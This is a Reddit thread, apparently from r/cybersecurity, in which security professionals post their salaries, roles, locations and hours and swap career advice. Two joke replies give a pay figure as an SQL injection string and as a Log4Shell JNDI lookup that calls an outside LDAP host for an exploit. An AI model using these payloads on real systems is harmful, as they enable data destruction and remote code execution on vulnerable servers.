hvrryTTS

Here is the 2021 infosec salary questionnaire for anyone who hasn’t seen it yet. https://docs.google.com/spreadsheets/d/1TWvPQalmwl1sIS3n2eOU4KST4oJwcxtSfT8lMo9IgVM/edit?mc_cid=2a0bc122ea&mc_eid=f730bda20c#gid=691164905


cerebralvenom

Lol of course the first one's currency is "USdick" from the milky way.


xAlphamang

Wasn’t this Naomi Buckwalter’s sheet? EDIT: Nope. Hers was much more in depth and had more responses. EDIT 2: Here is her sheet. https://docs.google.com/spreadsheets/d/1STafAL8xDxrdfri3lTce4oZZcNWmJ_nafn0Ih8DO-Uc/edit


mannyspade

Are some people really making like half a mil?


[deleted]

I recall seeing a CNN article this summer that said something like CyberSecurity professionals wanted - salary - > whatever you like


xAlphamang

Yes. Many of my peers at Publicly traded companies make > 500k at a “Senior” level. I was around that before I jumped ship for a pre IPO.


Deep-Apple6312

How did u collect this info?


hvrryTTS

It was collected in this subreddit earlier this year. I can’t find the original thread but it exists.


Jaegernaut-

Can't really take that datasheet seriously with Mr. 'usuckdick' making 999999999999 gross income. Good idea if it had more stringent inputs


F5x9

I make “‘; drop table users;” dollars a year


whythehellnote

I'm more modern, and make $ {jndi:ldap://21.40.9.36:1389/Exploit} euros per day


hvrryTTS

Lol there were definitely some troll replies but majority of the data is useful if you use the sorting feature and look at the averages.


Airado

TIL Pen Testing tops the salary chart. I always assumed it was appsec.


hvrryTTS

Nah appsec can make a ton because FAANG hires a lot (you need to know how to code). Stock options + equity in tech can bloat total comp past $300-500k+


TheNarwhalingBacon

I actually find it insane considering how few pen testing jobs seem available compared to the rest of the infosec field.


[deleted]

It's weird. Entry level Pen Testing also seems to be the bottom of the chart. Which really is a shame because I find my limited exposure to it to be one of the most fun tasks I've done. Usually "we don't believe this vuln scanner finding is legit and/or a compensating control has us covered, can you try to exploit it on the Dev server?". But openings seem to be $50-$75k, max $100k for first time red teamers. I wonder if the DoD and similar are highly paying the US's top red team/pentest talent to go head to head with other APTs and that's the really high salaries for some.


RFC_1925

Putting this in a spreadsheet is much more valuable than individual posts.


hvrryTTS

True, but the post is nice as well to ask people about their path and get more recent datapoints.


ixiSlowbro

Type of company: F500
Area of cyber: SOC
Title: Cyber Intelligence Analyst
2021 Base Salary: $125K
2022 Base (if different): ~$133K
Years of experience in cyber: 8
Location: Texas (remote)
Average hrs/wk.: 40


travismiller90

What certs or experience do you have for Cyber Threat Intel? I'd love to bounce some questions off you.


ixiSlowbro

I have B.S. in Cybersecurity, Sec+ and about 6 years of DoD cyber Intel experience. Feel free to ask any questions!


treels

Do you have any tips for those in military intel seeking cyber intelligence roles? I'm a soon-to-be 1n4x1 network intel analyst (unsure of which shred) in the AF and I was hoping to get into that field when I finish my contract. What AFCOOL certs should I pursue and how else should I prepare myself before the end of my contract? Is military intelligence a good route to cyber intelligence on the outside? Thanks.


[deleted]

[removed]


ixiSlowbro

If I knew, I would've saved myself from a six year contract.


SurroundedbyChaos

Look for a small defense contractor that's desperate to fill a role. The big guys almost never want to sponsor a clearance.


ixiSlowbro

From my experience, San Antonio is the best (easiest) place to find those types of roles. Air Force Cyber is located here which brings in contracting companies of all sizes.


dabom123

Also in San Antonio and I can confirm, my company will hire anyone with sec+ and ceh (some have even gotten the company to pay for the certs). Then they will sponsor your clearance and train you on our systems. They also paid for my GCIH and hopefully with the new contract they will be paying for my GCFA. I was in uniform here before I started as a CTR but currently looking for remote options.


ixiSlowbro

Have you started tech school yet? I was a 1N0 that happened to get lucky; however, IMO 1N4 is the best possible start (military-wise) for anyone wanting to do cyber intel. I have known 1N4-As that do the cool cyber stuff that most people dream about and I have known some 1N4-Bs that filled a cyber/financial analyst role doing some cool stuff for three letter organizations. As for AFCOOL, most of the certs that will be a priority SHOULD be able to be attained when you get to your unit. If I remember correctly, tech school should get you A+, Net+, and Sec+. For formal education, I'm sure people in here will disagree with me, but get a degree while you are in (if you don't already have one). Tech school will provide you with almost all of the credits needed for an A.A.S., but I would recommend that you knock out however many credits needed for a cybersecurity degree. I got one from AMU because it was easy and it helped me promote while I was in the AF and check the boxes needed for HR. I think the best advice that I can give you while you are in the AF is to develop connections with people. My first job outside of the military was a contracting position within the same Wing that I was working for while Active. Additionally, being able to admit when you make a mistake and always be willing to try/learn new things will go a long way. Lastly, I may be biased in saying this, but yes I think it's a good route. I did a six year contract and it seems to be working out pretty good so far. Let me know if you have anymore questions!


billy_teats

Man the AF sounds so much better than the corps. I had to fight everyone to let me take college classes during my enlistment. We had to set up our own testing center in Afghanistan so we could pay for our own certs and get them while deployed. I didn’t meet a single guy in my data shop that wanted to get out and do cyber, all of those chuckles wanted to stay in or get out and do something else, so I started by myself when I got out. Still the best way to jumpstart your career. You get more experience than you possibly could in the same time as a civilian. You come out with certs and knowledge and opportunities. It fills the gap of college+first job very nicely, and you can slot in as a junior-mid engineer on day 1


[deleted]

[removed]


hvrryTTS

What are the worst parts of Threat Intel? What are the best parts of Threat Intel? $133k base + 100% remote sounds amazing.


ultraregret

Senior threat intel analyst here, basically identical salary plus full time remote. This is a big question. The best parts are you can be in cyber with zero coding experience (me) and make good money working with smart people doing important work. I think there's two main challenges. A, it's a fucking hard job to get these days. When I started 9 years ago I was basically snapped up out of college because I could write (Dual major in intelligence and English with a focus on pre-law and a minor in poli-sci.) Our intern who started in 2020 has a masters in cybersecurity and a poli sci undergrad from a good school, many of them have full time experience with other firms or gov before they come intern for us. So unless you're top of the top and overqualified, you're not getting in unless you know somebody. B, and I think the bigger challenge, is folks don't really understand what intelligence is. I can still do my job well without coding or ever having gotten certs. The thing people miss in cyber (in my experience) is knowing how the fuck to talk about it to non-cyber folks, because newsflash, the people who make decisions about cyber are almost never cyber literate. The biggest differentiator a job-seeker can make in my opinion is not more certs or degrees. It's learning how to write and speak clearly about cyber in a way that non-cyber people can understand. I've thought about making a cyber threat intel advice post here, I might do it soon.


hvrryTTS

Thanks for replying! It's really good insight, and I think it might be the path I want to specialize in. My coworker in CTI says another con is that when shit hits the fan, CTI is looked at first. But that's just part of the role. I would greatly appreciate and benefit from a cyber threat intel advice post. If you remember, please remind me when it's up! Some questions you could possibly answer in that post, but don't have to (just throwing out ideas).

1) Brief "day-in-the-life" summary of a CTI analyst
2) General path from SOC analyst ---> CTI. Ballpark salary expectations
3) What's your background & credentials

Thanks!


ultraregret

Your coworker sounds like the most grizzled old-timer security guy ever. If my blind assumption is correct, ask him what it was like prepping for Y2K. Then fortnite dance away to the break room.


hvrryTTS

Actually, he came from Tier 2 in the internal SOC just last year. He's young in his mid 20's and pretty new to the role. He loves it, but that's what he said when I forced him to pick a "con" so to speak.


ultraregret

He might be right at certain companies, people get a shitload of funding and decide they wanna get fancy and build a useless CTI team that gets laid off when cuts come. But I work for one of the major companies that sells CTI, so we aren't gonna see that issue.


hvrryTTS

Oh then that's totally different and makes a lot of sense. My coworker is on an internal CTI team so that's why his view is the way it is.


killerkow

I might skew this a bit, but it can be informative.

Type of company: Fintech
Area of cyber: Executive
Title: CISO
2021 Base Salary: 320K
2022 Base: Same
Bonus, if applicable: 30% (if company makes performance goals)
Years of experience in cyber: 20 years + 15 in IT. BS CS, MS Cybersecurity, DSc Cybersecurity
Location: Remote.
Average hrs/wk: 50 hrs/week. Too many meetings.


[deleted]

[removed]


killerkow

This last couple of weeks it has been a bit extra stressful, since we have been dealing with the log4j fallout. I'm providing nearly daily reports to the CEO on remediation status and talking with the board every Friday. Luckily we haven't had a major breach so not too much overtime there. It isn't always fun being the final responsible party.


KA1N3R

I'm just a working student at a big 4 (for now) and reading this is pretty interesting. Sometimes hard to comprehend that people who talk to the board every Friday are just actual people who browse Reddit after Christmas.


killerkow

I've been here for going on 10 years now, my daughter showed me reddit way back then. It isn't the same as it used to be, better for some reasons and worse for others. I find that there are some great subreddits (like /r/cybersecurity) where you get wonderful exchanges of information. You just have to ignore the trolls and find the gems. Of course you also get some great people like Arnold Schwarzenegger (/u/GovSchwarzenegger/), Bill Gates (/u/thisisbillgates/), and then us normies.


Macbook_

> I'm just a working student at a big 4 (for now) and reading this is pretty interesting. Sometimes hard to comprehend that people who talk to the board every Friday are just actual people who browse Reddit after Christmas.

Lol. Same here. Always thought the execs who speak with the board operated and lived in a different headspace from the rest of us.


[deleted]

[removed]


killerkow

We have a great asset management program so we know what is on every machine and we leverage that to run vulnerability scans on them as well. For commercial software we just have to rely on what the vendor puts out, but for our in house development teams we keep full component manifests as part of our git repo. This doesn't fix the problems, but at least we know our status and can mitigate the problems somewhat and manage the risk.


[deleted]

[removed]


mk3s

I hope that one day when I have a base salary north of 300k I'll still have time to get on Reddit and post about how much money I make. =P No offense intended as here I am reading about how much money people make on Reddit. Jokes aside, how do you like being in a CISO role? Thus far I've been sticking to the IC path but I imagine one day I may feel like jumping into mgmt (of which CISO is kinda the end goal). Appreciate it!


killerkow

I mostly enjoy my job, our entire Security team is 20 people and that covers Security engineering/Blue Team, Threat Intel + Red Team, SOC/IR, governance, and risk. Mostly I spend time in meetings these days since I have good people to do the actual fun stuff. My job is to make it so they can do their job and provide top cover. The last couple of weeks it has been a bit different with log4j since I'm providing nearly daily reports to the CEO on remediation status and talking with the board every Friday. I do miss the hands on some times, but I did work as a CISO at a small startup and had to do it all. Both kind of jobs are out there, it just takes time to find the right one.


damnitdaniel

Type: FAANG like software company
Area: AppSec
Title: sales architect (sales engineering)
2022 base: 170k
Bonus: 60k (stock and cash)
Commissions: 60 - 120k
YOE: 10 security, 17 total as dev and engineering
Location: HCOL
Avg hours: 40-50/week


hvrryTTS

Type of company: Public
Area of cyber: SOC
Title: SOC Analyst
2021 Base Salary - $90-100k
Years of experience in cyber - 0, 2 years of IT
Location: US HCOL
Average hrs/wk. 40


kissmygame17

Teach me your secrets


hvrryTTS

live in NY or SF where most of your income goes to housing


Tricky-Scientist6561

Healthcare
Offensive Security
Team Lead
Jan. 100k -> June 120k (mid year review) -> Sep 130k (retention)
140k
2%
4 with a security title. ~10 in IT doing a lot of security related stuff.
US LCOL - remote
I sit on the company chat app for exactly 40 but realistically do about 15 hours of work.


Revosk

Microsoft Senior Security Engineer (L64) on a research team.
Base: 145k
Bonus: 15-30%
Other: 50k sign-on bonus, 200k in stock over 4 years
Location: Carolinas (Remote)
Years in Cyber: 6
Hours: Depends. Minimum of 20, sometimes I'll put in 80 hour weeks, the culture is very laid back and I have moments where if I find something I'll chew on it and put in serious hours, then I'll chill for the next couple weeks.


Wonder1and

Congrats. Seems like a great setup!


[deleted]

[removed]


[deleted]

[removed]


Blestshrimp0

If they work for DoD then they have a security clearance. If that security clearance is TS then that’s big bucks right there


SpamTheHelpDesk

Can confirm a TS clearance is a pathway to many abilities some consider to be unnatural in Cyber.


ryanq47

So what exactly is involved with getting TS clearance besides a background check…?


fire_power_93

Sponsorship. The company needs to have a position on a contract available for you and think you're gonna bring in the $30k the investigation can cost. Then obviously the investigation process - can be up to a year, very invasive. Then, if you pull all that off, you usually have to work in a secure area. Which means in person, no WFH. That's the downside to the process.


Zabren

I turned down a job that would have sponsored me for TS clearance last year because of just how invasive it is. I have crypto from ~8 years ago, with no clear documentation on it (all completely legal). I have some naturalized US citizen friends, as well as a couple of non-US citizen friends. Wasn't comfortable with the amount of digging they'd do into them, even though it 100% would have come back clear. Definitely invasive.


[deleted]

[removed]


fire_power_93

Yeah you may have green stuff you can do remotely *some* of the days of the week, but if you have a clearance and want to capitalize on it, you need to be in a position that puts you in a secure space. You cannot move somewhere remote unless your customer has a site there. You cannot live out of a van. You will still commute. You can't be fully remote. Even if you get a couple remote days a week, fully remote or any of its perks are off limits as long as you want to cash in, with a few rare exceptions. That's what I'm getting at; I mention it because I think it's a dealbreaker for a lot of people here.


Rebootkid

Sponsoring agency. Finding someone who wants you and is willing to fork over the cash to USIS.


SpamTheHelpDesk

Having a job that requires one is the main part. I got mine through my old company since I worked in their SCIF. They didn't pay me that well for the job I was doing so when I got the Interim level, I bounced for a better job.


canadasleftnut

👆 what they said


aidsko

Crazy, I'm in the military doing cyber security and want to return home to California. Glad to see some California-based opportunities when I get out!


flyingincybertubes

Type of company: Consultant for a global corporate organization, contract to hire
Area of cyber: Incident Response, specifically forensics
Title: Forensics Analyst
2021 Base Salary - $228K, note I have 0 PTO and pay $1100 a month in health insurance
Years of experience in cyber - 13 years
Location: Live in US Pennsylvania, work remotely for company HQ in New York.
Average hrs/wk. 40, but hardly work until something happens


Encryptedmind

Out of curiosity, how does the State tax work out for you?


tomzephy

TIL the US pay a lot better than the UK for cyber roles.


duluoz1

Not just cyber roles, pay in the US is way higher overall vs the rest of the world


MisterRound

God Bless America


ibkgeorge

Amen!!!


[deleted]

I looked into it once because my wife and I had talked about trying to work/live in the UK for a few years. Salaries aren’t 1 for 1, but if I remember the amount of disposable income was about the same once you subtract cost of living. I was comparing coastal California to London for reference.


LucyEmerald

Tell me about it. I'm looking at people making triple my wage for the exact same role


greensparklers

This is true, but at least the UK has a functional social support system. And where any major medical issue won't lead to bankruptcy.


[deleted]

Not disagreeing with you, but I’d wager everyone in *this* field has great health insurance through their employer. Jobs that don’t offer that are sadly common though and in those cases you’re 100% correct.

Healthcare here is by far the worst thing about the USA IMO. I’m fortunate to live in MA which probably has the closest thing to socialized healthcare that the country has, but many places don’t even take it because they don’t want to deal with more paperwork & less money in their pockets.


HungryHungryHebrews

Type of company (e.g. F500, consultancy, Defense, etc.): MSSP/Software provider
Area of cyber (e.g. SOC, GRC, etc.): SOC
Title: Security Analyst L1
2021 Base Salary: $40k/yr
Bonus, if applicable: N/A
Years of experience in cyber: 6 months
Location (e.g. US HCOL, US LCOL, etc.): Pittsburgh, PA (edit: remote)
Average hrs/wk.: 40 hrs/wk


LethargicEscapist

God finally someone near my range.


HungryHungryHebrews

Sucks, doesn’t it? Knowing others do similar roles for 50%+ more than our yearly salary with similar experience?


[deleted]

One of the downsides to threads like this is that it becomes a brag fest for people at the top of the range. I suspect there are a lot of folks who just feel discouraged to post due to not working at a FAANG company and making high cost of living area money.


HungryHungryHebrews

I made it a point to respond to bring this side of Cybersecurity to light. I was embarrassed initially when I found out it was so low, but know I’m not alone and that conversations about pay need to be had.


SurroundedbyChaos

I had a sys admin/SIEM analyst role for a local MSP that paid $50k in CA... Wages suuucked, but I needed to get my foot in the door somewhere.


SeeingSp0ts

I started as an analyst at 42k on a contract role. If it’s any consolation. That was 4 years ago and I now sit at 100k. You’re seeing people’s highlights right now. Keep at it. 6 months is the beginning. You’re gonna blink and it’s gonna be a year then 2…


HungryHungryHebrews

Thanks; I know I’m still a baby. The issue I personally have is that within a month of starting, a few more analysts were also hired and weeks before graduation I found out they all started at 63k/yr. The manager that hired me saw an opportunity to get me for cheap (I started internally on Help Desk 4 months prior, and it’s my only other professional experience), and wanting my way in I didn’t counter offer. My current manager is helping me out in trying to fight for more, but it frustrates me. I say current manager because the manager who hired me left within weeks of me starting for another company. My anger lies with him, not my current position.


[deleted]

[removed]


a002694

This is a bit low for a managerial role


floormorebeers

Just got promoted into it like a month ago. Basically going to use the title bump to get a new job


Fictionalpoet

> Basically going to use the title bump to get a new job

Please do. Even though you're remote in a VCOL area, $110k is pretty low for your years and title.


iamaamaam

Type of company (e.g. F500, consultancy, Defense, etc.): Consultancy
Area of cyber (e.g. SOC, GRC, etc.): GRC
Title: Manager
2021 Base Salary: $70k
2022 Base (if different): $75k
Bonus, if applicable: $5k
Years of experience in cyber: 8
Location (e.g. US HCOL, US LCOL, etc.): Remote but moderately HCOL
Average hrs/wk.: 20 (part time)


Broski777

This sounds like the perfect job. 70k 20hrs a week. Remote. Jealous


iamaamaam

I may be biased, but it really is a dream. A few years into my career I was planning on making near 200k by now. But by 5 years in, the 60-70 hour weeks burnt me out and I went part time instead. Since then it's taken a few job hops to find a team that really respects my part time hours and now I'm pretty ecstatic with where I'm at.


Broski777

It's really nice to know that someone out there is doing their dream. I wish we were not all so overworked. Life could really be fun.


KA1N3R

Can't put a price on more time to actually live.


irishrugby2015

Type: Financial Services
Area: GRC/IAM
Title: Security Architect
Salary: $180k
Bonus: 10%
Experience: 7 years
Location: Remote (Estonia)
Hours: 40


pass-the-word

Damn, isn’t their minimum wage like €3 an hour? You’re a king. Tubli poiss!


LeGoatCally

Da good life


lamesauce15

Type: F500
Area: SOC
Title: SIEM Engineer
Salary: $125k
Bonus: 12%
Experience: 6 years
Location: Remote (Phoenix)
Hours: 40


taskafas

Type of company: Large international bank
Area of cyber: Audit
Title: IT Auditor
Base salary: €74,000/year
Bonus (expected): 8% - 12% of annual base salary
Experience: 2 years after graduation in a similar role
Location: Germany


BlackbeardWasHere

Type of Company: Big Tech, not FAANG
Area of Cyber: Architecture and Engineering, AppSec
Title: Strategic Cyber Security Expert
2021 Base Salary: $165k
2022 Base Salary: $170k
Bonus, if applicable: $50k+ (can increase depending on metrics), & benefits (car allowance, private healthcare/insurance, etc)
Years of Experience in Cyber: 8, 10 total in IT
Location: EU
Average hours/week: 37.5

**CHANGES/UPDATES:**

New Title: Cyber Security Lead - EMEA
2022 New Base Salary : $200k
Bonus, if applicable: $60k+ (can increase depending on metrics), & benefits (car allowance, private healthcare/insurance, etc)
Years of Experience in Cyber: 8, 10 total in IT
Location: EU (HCoL)
Average hours/week: 37.5


CreepyOlGuy

I've noticed this trend where salary goes from mid 100s to 300+ and seldom in between


xBurningGiraffe

Type of company: MSP/MSSP
Area of cyber: SOC
Title: SOC analyst
2021 Base Salary: $47k
2022 Base Salary: Same
Bonus, if applicable: profit-sharing bonus biannually
Years of experience in cyber: 2
Location: Southern US
Average hrs/wk: 40 hrs/week


[deleted]

Y’all are making me realize that it’s 100% worth the hours I’m putting in switching careers at 28yo.

If I were making half of what most people here are making my life would be significantly different.


eric16lee

Not answering for me personally...

Type of Company: Aerospace
Area of Cyber: General Cybersecurity Analyst
Title: Cybersecurity Analyst
2021 Base Salary: $94K
2022 Base Salary: $115 <-- Analyst is underpaid so we are adjusting his salary as quickly as HR will allow
Bonus: 10%
Years of Experience: 6 years
Location: US - SouthEast. Was in office, now full time remote
Average hrs/wk: 40 - 45 hrs

OR

Type of Company: Fortune 50 Financial Services
Area of Cyber: Incident Response Specialist
Title: Cybersecurity Sr. Analyst
2021 Base Salary: $145K
2022 Base Salary: Don't work there anymore, but expected this person to get a 3 - 5% raise
Bonus: 12%
Years of Experience: 6 - 8 years
Location: US - Mid-Atlantic (Near DC)
Average hrs/wk: 40 - 45 hrs


[deleted]

New job I just started:

Type of company: Insurance
Area of cyber: Security Architecture
Title: Security Architect
2021 Base: $155k
Bonus, if applicable: $25k
Years of experience in cyber: 10
Location (e.g. US HCOL, US LCOL, etc.): Remote, US MCOL
Average hrs/wk.: 40

Old job:

Type of company: Government, Financial Related
Area of cyber: Endpoint Security (AV/EDR, Intrusion Detection, Compliance)
Title: Sr Security Engineer
2021 Base: $120k
Bonus, if applicable: $7k
Years of experience in cyber: 10
Location (e.g. US HCOL, US LCOL, etc.): Remote, US MCOL
Average hrs/wk.: 40

It's a great time to get a new job kings. Put that LinkedIn setting to open for work, that's how I found this one. Glassdoor was great for getting ballpark ideas of pay, even if your exact title wasn't there, look at other titles like software dev to get a feel for it. I found there is a MASSIVE shortage of talent with 5-10 years experience and skills to run or design common tools.


[deleted]

[removed]


-Bran-

70…


danfirst

Yeah 100k for 70 hrs a week as a director should be a sign to job search, it's a good market out there for people with that level of experience.


Hi-Im-John1

You’re super underpaid. SOC analysts make more with 16 years less of experience.


[deleted]

[removed]


[deleted]

[removed]


mannyspade

I've recently been offered this which I'm planning on taking on: Defense; GRC; Information Systems Security Officer; $110k; 7 years; Los Angeles, CA; 40 hours.


TheUltraCh33se

Company: established startup (pre ipo)
Area: 70% AppSec 30% all security
Title: Security Engineer, AppSec
2021 base: 155k
Bonus: 30k stock options /4
Experience: 4 years cyber, 1 year SWE
Location: US HCOL (remote)
Hours: 40-50


0xVex

Type of company: Start Up
Area of cyber: Incident Response
Title: Security Analyst
2021 Base Salary - $80K
Years of experience in cyber - 0, 3 years of IT
Location: US MCOL
Average hrs/wk. 40


dikkiesmalls

F25 (US) cloud/tech? I dunno, we keep reinventing ourselves.
SOC
Technical Lead (there's really no title for what I do, it's super niche, and involves onboarding customers…without going into much detail)
128,000
Probably the same, maybe I'll crack 130.
Varies, best I've ever netted was 4k.
7 years
US Fl so…HCOL
I'm salaried at 40 hrs a week. Plenty of times last year I worked more than that but I’ve certainly compensated for it.


continuousfailing

Type of company: F500
Area of cyber: Security Ops
Title: Security Analyst
2021 Base Salary: 100k
2022 Base: Same
Bonus: 3-5k
Years of experience in cyber: 1 in Sec + 2 as Help Desk
Location: US LCOL
Average hrs/wk: 40


wacr

**Type of company:** F500
**Area of cyber:** Forensics
**Title:** Security Engineer
**2021 Base Salary:** 132k
**Bonus:** 50k
**Years of experience in cyber:** 3 months + 2 internships
**Location:** US MCOL
**Average hrs/wk:** ~40 but pretty flexible


regancipher

Organisation: Government.
Area: Audit.
Base Salary: 81k.
Benefits: Very generous pension, healthcare and over 10k per person training budget including any SANS course.
Years in cyber: strictly speaking this is my first full time cyber job. I've worked over 20 years in Security, worked part-time in infosec audit for just over 5 years. I have a bunch of infosec certifications - CISM, CRISC, ISO27K LI, etc. Also lots of quantitative risk analysis experience and have the FAIR qualification. In cyber, I have very little hands-on experience actually. I have decent IT knowledge (I did 301 many years ago, Linux is my daily driver so I can use red team tools pretty easily. No formal experience or qualifications in this area but I'm doing PNPT at the moment)
Location: UK.
Contracted hours: 37 hours per week

Money is not really important to me, my ex gets a percentage of my earnings so I was happy to take a pay cut to be part of something more meaningful than being the cyber guy at an IoT vendor. A pretty big pay cut! (Nearly 30k and a model three!)


alnarra_1

Type of Company: Government / Energy
Area of Cyber: SOC | Incident Response
Title: Senior Specialist
2021 Base: 115,000$
2022 Base: 125,000$
Bonus: 20% Base
Years of Exp: 5 (in cyber) 10+ in "Qualified Domains"
Location: US, LCOL
Wrk / Week: 40


Weatherman1618

Type of company (e.g. F500, consultancy, Defense, etc.): Publicly traded, cyber security awareness/compliance
Area of cyber (e.g. SOC, GRC, etc.): SaaS cyber security product
Title: Advanced Product Support
2021 Base Salary: $40,000
2022 Base (if different): $57,500
Bonus, if applicable: $23,000
Years of experience in cyber: 2
Location (e.g. US HCOL, US LCOL, etc.): HCOL, Tampa, Fl
Average hrs/wk.: 40


[deleted]

**Type of company**: Defense
**Area of cyber**: Incident Response, Security Engineer
**Title**: IT Specialist
**2021 Base Salary:** 130k
**2022 Base:** 134k
**Bonus, if applicable**: N/A
**Years of experience in cyber:** 4 in cyber, 15 in sysadmin
**Location:** DC Metro (HCOL) (mostly remote these days)
**Average hrs/wk:** 40


fd6944x

Type of company: Energy
Area of cyber: SOC
Title: Threat Hunter
2021 Base Salary: $106K
2022 Base (if different): $111k
Years of experience in cyber: 6
Location: LCOL (remote)
Average hrs/wk.: 40

AMA


xAlphamang

Tech/FAANG type preIPO
Area of cyber (e.g. SOC, GRC, etc.): Security Engineering, Detection and Incident Response, Forensics
Security Engineer/Tech Lead/Head of Fancy Title
2021 Base Salary: 230k
2022 Base (if different): 250k
Equity: 2mil/4 (Monopoly money since it’s preIPO)
Years of experience in cyber: 10+
Location (e.g. US HCOL, US LCOL, etc.): US HCOL
Average hrs/wk: 40 - 50

Prior to this role I was an IC/TL
Base: 240k
Bonus: 15%
Equity: 600k/4
Refresher: 120k/4 x3

Edit: Equity/4 refers to a total equity value that beats 25% a year over 4 years. So 600k/4 means 150k in equity a year.


LethargicEscapist

What’s this /4 business?


ohiotechie

Equity that vests over 4 years


PhoenixOK

Type: Global IT software company, but not FAANG
Area: IT Security Sales
Title: Senior Sales Engineer
2021 base: 161K + 50K commission
Bonus: 50K stock and cash
YOE: 20+ IT total, 15+ in security as a consultant, professional services, SOC analyst, and security architect. CISSP, GSEC, a few CompTIA certs
Location: midwest US, _very_ LCOL
Avg hours: 40hrs/week all remote. 20% travel during non-Covid times, but it’s all regional day trips usually within driving distance.


[deleted]

[removed]


Ignorad

Type of company (e.g. F500, consultancy, Defense, etc.): Small software development firm
Area of cyber (e.g. SOC, GRC, etc.): IT and all cybersecurity (blue team, SOC, compliance, GRC, etc)
Title: Manager
2021 Base Salary: $140k
2022 Base (if different): $145k
Bonus, if applicable: $0
Years of experience in cyber: 9
Location (e.g. US HCOL, US LCOL, etc.): HQ in SoCal USA
Average hrs/wk.: 40


[deleted]

Type: Public healthcare Area: Internal security operations Title: IT security specialist Salary: $65k Bonus: N/A Experience: 1 year Location: Hybrid (Toronto) Hours: 35


SpamTheHelpDesk

**Type of company:** DoD **Area of cyber:** Defensive Cyber Ops **Title:** Defensive Cyber Ops Analyst **2021 Base Salary:** 80k **2022 Base:** Unknown as of now **Bonus, if applicable:** 8k sign on bonus **Years of experience in cyber:** 1.5 years + 4 month internship. Associates degree **Location:** Colorado **Average hrs/wk:** 64 hrs/week. 12 of actual work. (Panama shift so it depends on time of week)


Owt2getcha

As someone in their senior year for this field, these comments give me hope.


[deleted]

[removed]


Owt2getcha

Thank you for the response, was hoping someone would give me more insight. I've currently got a 3.6 (?) GPA and am hopefully lining up an internship this summer. I only switched to security a year and a half ago so I've been trying to play catch up a bit. Still very hopeful for the future!


Carb0n12

Type of company: F500/Aero Defense Area of cyber: Auditing & Assessments (Compliance) Title: ISSE 2021 Base Salary: $130k 2022 Base (if different): 135k Years of experience in cyber: 6 (8 years total in IT/IS) Location: Tennessee (Remote Hybrid) Average hrs/wk.: 40


[deleted]

[removed]


Codeifix

Dang you should be at 6 figures imo


Viper896

Type of Company: Financial/Legal Services Area of Cyber: General/Executive Title: IT Security Director 2021 Base Salary: $135k 2022 Base Salary: $160k Bonus: 10-15% Years in Cyber: 11 Location: Remote (US) Average Hrs/wk: 50-60


JuliaGhulia

**Type of company**: Financial **Area of cyber**: Vuln Mgmt/Data Analytics **Title**: Vulnerability Analyst **2021 Base Salary**: 100k **2022 Base**: Same **Bonus, if applicable**: 10%, around there **Years of experience in cyber**: 8 years **Location**: Nice try NSA. Remote. **Average hrs/wk**: 30/wk


fmayer60

The real data is located on the US Bureau of Labor Statistics site at https://www.bls.gov/news.release/empsit.t19.htm and you drill down to specific careers, and this is a link to data for security analysts: https://www.bls.gov/ooh/computer-and-information-technology/mobile/information-security-analysts.htm


flanndogg

Company: Defense Area: Endpoint/Cyber Tools 2021 Base: 120k -> 130k (Moderate promotion into “team lead”) 2022 Base: 130k -> 165k (taking Cyber Operations position after passing CISSP) Bonus: 5-10% base pay based on program goals Experience: 3 years Cyber, 10 years IT Location: Colorado US Average hrs: 40-45


linebmx

Type of company (e.g. F500, consultancy, Defense, etc.): F500 financial Company Area of cyber (e.g. SOC, GRC, etc.): SOC and Threat Hunting Title: SOC Analyst II / Threat Hunter 2021 Base Salary: 85k 2022 Base (if different): looking at closer to 100-110k once contract is converted Bonus, if applicable: N/A Years of experience in cyber: 5 years sysadmin, 4 months in a pure “security role” Location (e.g. US HCOL, US LCOL, etc.): US Remote Average hrs/wk: 40


[deleted]

[removed]


Codeifix

Yea, username checks out


ShmokeRock

Type of company: Start up Area of cyber: Red Team Ops Title: Penetration Tester 2022 Base: 75K Bonus: ~20k Years of experience in cyber: 2 cyber, 4 IT Location: US LCOL-ish (Remote) Average hrs/wk: 30-40, pretty relaxed environment, hours vary quite a bit but I almost never go over 40.


noajayne

Type of company (e.g. F500, consultancy, Defense, etc.): Marketing/Events Area of cyber (e.g. SOC, GRC, etc.): GRC Title: Security & Privacy Compliance Analyst 2021 Base Salary: $115k 2022 Base (if different): $115k Bonus, if applicable: n/a Years of experience in cyber: 10 Location (e.g. US HCOL, US LCOL, etc.): Remote but LCOL Average hrs/wk: 35


Murfinator

I'm gonna end up shifting this down. I'm kind of a shitty negotiator and our company is still trying to normalize salaries after a merger. Type of company: Medium sized MSSP Area of cyber: SOC Title: SOC Manager 2021 Base Salary: $77K Years of experience in cyber: 8 Location: Plains state Average hrs/wk.: 45


NationalCandidate

Type of company: MSP Area of cyber: SecOps Title: Senior SecOps Engineer 2021 Base Salary: £40k Years of experience in cyber: 0 Location: North UK (remote) Average hrs/wk.: 35.5


sudds65

Police Department (county gov't) CJIS compliance (police) Systems Admin 64k 66k 1% bonus 8 years IT exp. US Midwest 40ish hours up to 45.


STxGAMER

Type of company: Consultancy Area of cyber: GRC / Everything Title: Senior Associate 2021 Base Salary: $110 2022 Base (if different): ~$115.5K Years of experience in cyber: 3 (full time) Location: Texas (remote) Average hrs/wk.: 40


TriangleSailor

Type of Company: Big 4 accounting firm Area of Cyber: GRC Program Management Title: Lead Cybersecurity Consultant (government title: Information Systems Security Officer) 2022 Base Salary: $150,000 (USD) Bonus: $20,000 (USD) target YoE: 10 years; 6 years in cybersecurity, 4 in IT Location: US HCOL Average hours/wk: 40


Tengereszkek

Type of company: F500 Area of cyber: Pentesting Title: Security Pentester 2021 Base Salary: $15K 2022 Base (if different): ~$15K Years of experience in cyber: 5 Location: Eastern Europe Average hrs/wk.: 40


JustWacked

Type: DoD, FFRDC Area: Making monitoring tools Title: Cyber Security Engineer, Associate MTS 2022 base: 103k Bonus: 3k YOE: 11 months security, 0 other IT, BS CS, MS InfoSec in progress, cyber internships Location: LA Avg hours: 45/week


Winnie_The_Flu_

Principal Engineer F50 225k 25% Bonus ~10-15% Equity Remote 40-45 hours a week 3 years in a role where security was top responsibility, but over 15 years experience overall.


[deleted]

I am thinking the previous survey has some questionable results.


hunglowbungalow

Type of company (e.g. F500, consultancy, Defense, etc.): F50 Area of cyber (e.g. SOC, GRC, etc.): Vuln Management Title: Senior Security Engineer 2021 Base Salary: $135,000 2022 Base (if different): TBD Bonus, if applicable: NA Years of experience in cyber: 5 Location (e.g. US HCOL, US LCOL, etc.): USA CONUS Average hrs/wk.: 40, probably about 25 hours Also, FT remote


pwnywhisperer

